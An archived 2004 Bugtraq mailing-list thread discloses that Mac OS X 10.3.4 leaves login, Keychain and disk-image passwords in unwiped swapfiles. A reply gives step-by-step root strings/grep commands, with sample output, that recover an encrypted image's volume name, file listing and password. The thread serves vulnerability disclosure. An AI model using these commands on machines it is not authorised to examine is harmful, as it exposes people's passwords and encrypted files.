lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040716145135.25141.qmail@www.securityfocus.com>
Date: 16 Jul 2004 14:51:35 -0000
From: <johnny@...ckstuff.com>
To: bugtraq@...urityfocus.com
Subject: Re: Mac OS X stores login/Keychain/FileVault passwords on disk




The issue of getting into AES128 encrypted disk images is easy to 
unravel with this swapfile problem. 

We'll start by grabbing the volume name of an AES128 encrypted disk 
image file. Assuming the image name is test1.dmg, try: 

root# strings -8 /var/vm/swapfile* | grep -B1 test1.dmg | grep 
Volumes 
/Volumes/SECRET 

Armed with the volume name, we can grab the file listing of that 
(supposedly protected) AES128 encrypted disk image.  Since our 
volume name is 'SECRET'. Try: 

root# strings -8 /var/vm/swapfile* | grep "<string>/Volumes/SECRET" 
<string>/Volumes/SECRET/secretporn.pdf</string> 
<string>/Volumes/SECRET/secretphoto.jpg</string> 
<string>/Volumes/SECRET/badmovie.mpg</string> 
<string>/Volumes/SECRET/horriblybadmovie.mpg</string> 
<string>/Volumes/SECRET/naughty.mpg</string> 
<string>/Volumes/SECRET</string> 

To REALLY get at those (supposedly protected) files, we could use the 
password. It's easy to grab it even if it's not in the keychain: 

root# strings -8 /var/vm/swapfile* | grep -B1 "/System/Library/
CoreServices/DiskImageMounter.app" 

[... snip ... ] 
-- 
mySecretPasswordTest 
/System/Library/CoreServices/DiskImageMounter.app 
[... snip ... ] 

The only chore may be figuring out which password goes with which 
disk image. And that's not nearly the chore of popping AES128 
encryption... 

j0hnny 

http://johnny.ihackstuff.com 
johnny@...ckstuff.com 



-------------------------------------
From: Adi Kriegisch <adi@...tuwien.ac.at> 
To: bugtraq@...urityfocus.com 
Subject: Re: Mac OS X stores login/Keychain/FileVault passwords on 
disk 
Sent: Monday, July 12, 2004 9:05 AM 



The swapfiles are deleted on startup -- this means even a clean 
shutdown by 
user leaves the passwords on disk. 
So if you loose your powerbook someone might boot it in "target disk 
mode" and 
will be able to get your password! 

Adi 

=== 


 
 
It seems that Mac OS X (10.3.4 tested) doesn't bother clearing memory 
containing sensitive data, or using mlock() to avoid swapping. 

A quick grep of the swapfiles will show up various morsels: 

rez:~> sudo strings -8 /var/vm/swapfile0 |grep -A 4 -i longname 
longname 
password 
<user's password here> 
/bin/zsh 
username 
--- 
... various other occurrences follow 


Grepping for context around "password" also shows up results, and 
grepping 
for portions of a Keychain password (differing from the login password) 
will also get results. It appears that loginwindow is one of the apps 
involved, I haven't investigated what else is involved. The amount of 
memory and usage patterns of the machine will affect what gets 
swapped, 
though loginwindow seems likely to get swapped early since it is 
seldom 
used after login. 

Obviously this is only of interest if an attacker has root (or physical) 
access to a machine, however it does make FileVault or Keychain 
encryption 
fairly useless. It appears that the swapfiles are removed on shutdown 
or 
startup, though not wiped - pulling the power from a sleeping 
machine, 
and/or booting from CD, would quite easily retrieve the password(s). 

Reported to Apple on 21 June, I haven't had any response. It'd be nice 
if 
they at least said "we're taking a look if it's an issue". 

Matt 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ